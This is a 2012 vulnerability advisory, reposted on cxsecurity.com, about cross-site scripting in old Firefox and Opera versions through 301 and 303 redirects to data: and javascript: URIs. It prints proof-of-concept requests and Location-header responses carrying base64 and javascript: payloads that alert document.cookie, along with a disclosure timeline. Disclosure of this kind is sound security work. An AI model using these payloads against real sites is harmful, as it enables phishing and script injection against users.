Multiple Browsers Cross-Site Scripting via redirectors 301 and 303

2012-10-01 / 2012-10-29
Credit: Eugene Dokukin aka MustLive
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Here is information about Cross-Site Scripting vulnerabilities via redirectors with statuses 301 and 303 in different browsers. This is continuation of my 2009's and 2010's advisories and articles about 302 redirectors, such as article "Cross-Site Scripting attacks via redirectors" (http://websecurity.com.ua/3386/). At 16.09.2012 I've found that Mozilla hiddenly fixed two XSS vulnerabilities via 302 redirectors in browsers Firefox 10.0.7 and Firefox 15.0.1 (about which I've informed them by e-mail and in Bugzilla and wrote in articles in 2009 and 2010), without any official announcements and referencing on me. As I've checked in detail in all branches of the browser from 3.0.19 till 15.0.1, in Mozilla Firefox 8.0.1 these XSS were working, and in 9.0.1 already did not, i.e. they were hiddenly fixed in version 9.0. And that day I've found Cross-Site Scripting vulnerabilities in browsers Mozilla Firefox and Opera via location header at statuses 301 and 303. The attacks via other 30x statuses don't work. ------------------------- Affected products: ------------------------- Vulnerable are Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 and previous versions. And Opera 10.62 and previous versions. The browsers IE6, IE7, IE8 and Chrome are not affected. Opera Software fixed (in lame way without referencing on me, which was not the fist time for them) this hole in Opera 10.63. The fix was for 302 redirectors, which I've wrote about earlier concerning Opera and other browsers, but it should concerns also 301 and 303 redirectors. ---------- Details: ---------- Cross-Site Scripting (WASC-08): XSS attacks via location-header redirectors with 301 and 303 statuses. Attack #1: Attack is doing by redirecting to data: URI (with or without using of base64). With request to script at web site: http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Which returns 301 code in the answer: HTTP/1.1 301 Moved Permanently Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ Or returns 303 code in the answer: HTTP/1.1 303 See other Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ Attack works in Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 ad Opera 10.62. Because in the browsers Firefox and Opera the code is executing not in context of this site, hence there is no access to cookies. This vulnerability in browsers can be used for conducting of fishing attacks and executing of JavaScript code. Attack #2: Attack is doing by redirecting to javascript: URI. With request to script at web site: http://site/script.php?param=javascript:alert(document.cookie) Which returns 301 code in the answer: HTTP/1.1 301 Moved Permanently Location: javascript:alert(document.cookie) Or returns 303 code in the answer: HTTP/1.1 303 See other Location: javascript:alert(document.cookie) Attack works in Opera 10.62 (as Strictly social XSS). Because in Opera the code is executing not in context of this site, hence there is no access to cookies. This vulnerability in browser can be used for conducting of fishing attacks and executing of JavaScript code. ------------ Timeline: ------------ 2009.03.04 - informed Mozilla about XSS via different charsets and Charset Remembering vulnerability. Mozilla ignored. 2009.08.28 - informed Mozilla about XSS vulnerability via redirector with 302 status. Mozilla ignored. 2010.08.07 - informed Mozilla about another XSS vulnerability via redirector with 302 status. Mozilla ignored. 2011.11.08 - Mozilla fixed part of charsets holes in MFSA 2011-47 (after informing from other researcher). 2011.12.20 - Mozilla hiddenly fixed XSS via 302 redirectors in Firefox 9.0. 2012.04.24 - Mozilla fixed other part of charsets holes in MFSA 2012-24 (after informing from other researcher). 2012.09.16 - found hidden Mozilla fix of 302 redirectors in Firefox 10.0.7 and Firefox 15.0.1. And later found that it was fixed already in 9.0. 2012.09.16 - checked XSS attacks via 301 and 303 redirectors in different browsers. 2012.09.25 - disclosed at my site (http://websecurity.com.ua/6067/). Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua

References:

http://websecurity.com.ua/3386/
http://websecurity.com.ua/6067/
http://cxsecurity.com/issue/WLB-2012100119


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top